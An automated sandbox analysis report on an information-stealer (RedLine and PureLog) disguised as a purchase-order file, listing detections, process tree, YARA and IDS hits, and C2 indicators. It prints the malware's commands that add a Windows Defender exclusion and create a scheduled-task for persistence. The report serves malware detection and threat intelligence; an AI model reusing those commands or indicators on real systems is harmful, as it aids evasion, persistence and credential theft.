Edit tour

Windows Analysis Report
RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe

Overview

General Information

Sample name:	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe
Analysis ID:	1538180
MD5:	e2ab6ff49774a8d73f56e95ea4b5fde9
SHA1:	2e4744a2bf1dd07ebb2b585afbc2d02227bf8ee7
SHA256:	829026e0d6a6f73f3328bb4aabd5f0e3f063f000cd9d860c051b307e148395d5
Tags:	exeuser-threatcat_ch
Infos:

Detection

PureLog Stealer, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected PureLog Stealer

Yara detected RedLine Stealer

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Contains functionality to behave differently if execute on a Russian/Kazak computer

Contains functionality to detect sleep reduction / modifications

Creates files in the system32 config directory

Creates files inside the volume driver (system volume information)

Drops executable to a common third party application directory

Found direct / indirect Syscall (likely to bypass EDR)

Infects executable files (exe, dll, sys, html)

Initial sample is a PE file and has a suspicious name

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries random domain names (often used to prevent blacklisting and sinkholes)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Connects to many different domains

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Enables driver privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Queries time zone information

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Uncommon Svchost Parent Process

Spawns drivers

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe" MD5: E2AB6FF49774A8D73F56E95EA4B5FDE9)

svchost.exe (PID: 3744 cmdline: "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe (PID: 4040 cmdline: "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe" MD5: E2AB6FF49774A8D73F56E95EA4B5FDE9)

svchost.exe (PID: 416 cmdline: "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

microsofts.exe (PID: 2172 cmdline: "C:\Users\user\AppData\Local\Temp\microsofts.exe" MD5: 1B1EC94BDE0A57A4A82BD2F20B2CB7F3)

Native_Redline_BTC.exe (PID: 4340 cmdline: "C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe" MD5: 8C8785AC6585CF5C794B74330B3DB88F)

build.exe (PID: 3848 cmdline: "C:\Users\user\AppData\Local\Temp\build.exe" MD5: 3B6501FEEF6196F24163313A9F27DBFD)

server_BTC.exe (PID: 1804 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

powershell.exe (PID: 7364 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7768 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7396 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:46 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TrojanAIbot.exe (PID: 7520 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

cmd.exe (PID: 7532 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE6E4.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 7604 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

alg.exe (PID: 7108 cmdline: C:\Windows\System32\alg.exe MD5: BE9575A7523344297F06EE1BFB41DB64)

AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)

AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)

AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)

AppVClient.exe (PID: 6740 cmdline: C:\Windows\system32\AppVClient.exe MD5: 573992C0DD7C44238DCA534EBFE3BFB0)

FXSSVC.exe (PID: 7232 cmdline: C:\Windows\system32\fxssvc.exe MD5: D2034B1C51807A88AF4C03FA40EBB801)

TrojanAIbot.exe (PID: 7644 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)

elevation_service.exe (PID: 7828 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: 88EB3A4B54A3BB575F73218A2A487C14)

maintenanceservice.exe (PID: 7936 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 3FE71716DC381236318F40AD7E696866)

msdtc.exe (PID: 7988 cmdline: C:\Windows\System32\msdtc.exe MD5: 51F79D9079F5ECD5822D4A712D6E0FAE)

PerceptionSimulationService.exe (PID: 8120 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 7E2B07A2C35B902626802E23A74035AA)

perfhost.exe (PID: 1196 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: F1E10FE188A674DD70DDE06D821B689D)

TrojanAIbot.exe (PID: 7328 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)

Locator.exe (PID: 7464 cmdline: C:\Windows\system32\locator.exe MD5: F35972F9178514C7C96BA5F70EBD6D0F)

SensorDataService.exe (PID: 3452 cmdline: C:\Windows\System32\SensorDataService.exe MD5: EFF39178E107116F25C210E8F7E3BD8D)

snmptrap.exe (PID: 5344 cmdline: C:\Windows\System32\snmptrap.exe MD5: 49483B645B4353EA55A5E7C5EB864F13)

Spectrum.exe (PID: 7356 cmdline: C:\Windows\system32\spectrum.exe MD5: 3B684CE90D25C1620D4492D93A4C2E12)

ssh-agent.exe (PID: 7656 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: 22C8B35FC221B2E00B4C6D91C2FD5A99)

TieringEngineService.exe (PID: 7940 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: 8D1BA858E12A31A352EFC97D6B03E07E)

AgentService.exe (PID: 7576 cmdline: C:\Windows\system32\AgentService.exe MD5: 2BED1C40DED153B0705AD41485608E38)

vds.exe (PID: 8088 cmdline: C:\Windows\System32\vds.exe MD5: A5ACADA58AE262FF7A95C041CC61974E)

wbengine.exe (PID: 7404 cmdline: "C:\Windows\system32\wbengine.exe" MD5: E47BE0CB009D27E2C029678B8A634B14)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["212.162.149.53:2049"], "Bot Id": "FOZ", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\build.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\microsofts.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 33 88 44 24 2B 88 44 24 2F B0 50 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.1795311525.0000000012787000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000B.00000000.1782677998.0000000000332000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000003.2074768669.00000000073D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000003.1766272892.00000000007DD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000002.1946375903.0000000002736000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.1946375903.0000000002736000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000003.2073816640.00000000062D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000005.00000000.1759244489.0000000000312000.00000002.00000001.01000000.00000006.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000002.1767717625.0000000005C00000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 33 88 44 24 2B 88 44 24 2F B0 50 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000005.00000002.1795311525.00000000126F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000005.00000002.1795311525.00000000127D2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000002.1768367240.0000000006800000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000003.2069513140.00000000062D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000003.2069994712.00000000073D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: microsofts.exe PID: 2172	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: Native_Redline_BTC.exe PID: 4340	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: build.exe PID: 3848	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.3.microsofts.exe.6a0000.1115.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.3.microsofts.exe.6a0000.923.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.2.svchost.exe.5c00000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 33 88 44 24 2B 88 44 24 2F B0 50 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
5.2.Native_Redline_BTC.exe.12744d08.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.svchost.exe.6800000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.Native_Redline_BTC.exe.127db188.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
5.2.Native_Redline_BTC.exe.12744d08.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.0.microsofts.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 33 88 44 24 2B 88 44 24 2F B0 50 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
4.3.microsofts.exe.6d0000.1001.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.3.microsofts.exe.7dde10.17.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.Native_Redline_BTC.exe.1278ff50.5.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.svchost.exe.6800000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.3.microsofts.exe.7dde10.17.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.3.microsofts.exe.6b0000.1002.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.3.microsofts.exe.6a0000.1158.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.Native_Redline_BTC.exe.1278ff50.5.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
5.0.Native_Redline_BTC.exe.310000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.0.build.exe.330000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
5.2.Native_Redline_BTC.exe.127db188.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 14 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1804, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 7364, ProcessName: powershell.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ProcessId: 1804, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:46 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:46 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1804, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:46 /du 23:59 /sc daily /ri 1 /f, ProcessId: 7396, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\microsofts.exe, Initiated: true, ProcessId: 2172, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49741

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe", CommandLine: "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, ParentProcessId: 6516, ParentProcessName: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe", ProcessId: 3744, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 1804, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 7364, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe", CommandLine: "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe", ParentImage: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, ParentProcessId: 6516, ParentProcessName: RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe", ProcessId: 3744, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-20T18:41:24.111716+0200	2051649	1	A Network Trojan was detected	192.168.2.4	53837	1.1.1.1	53	UDP
2024-10-20T18:41:26.032743+0200	2051649	1	A Network Trojan was detected	192.168.2.4	50249	1.1.1.1	53	UDP

ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-20T18:41:22.062260+0200	2051648	1	A Network Trojan was detected	192.168.2.4	61199	1.1.1.1	53	UDP
2024-10-20T18:41:23.952675+0200	2051648	1	A Network Trojan was detected	192.168.2.4	53926	1.1.1.1	53	UDP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-20T18:41:15.163662+0200	2018141	1	A Network Trojan was detected	54.244.188.177	80	192.168.2.4	49735	TCP
2024-10-20T18:42:04.887694+0200	2018141	1	A Network Trojan was detected	13.251.16.150	80	192.168.2.4	49806	TCP
2024-10-20T18:42:07.863126+0200	2018141	1	A Network Trojan was detected	44.221.84.105	80	192.168.2.4	49827	TCP
2024-10-20T18:42:39.898172+0200	2018141	1	A Network Trojan was detected	34.211.97.45	80	192.168.2.4	49988	TCP
2024-10-20T18:43:12.270333+0200	2018141	1	A Network Trojan was detected	44.213.104.86	80	192.168.2.4	50145	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst

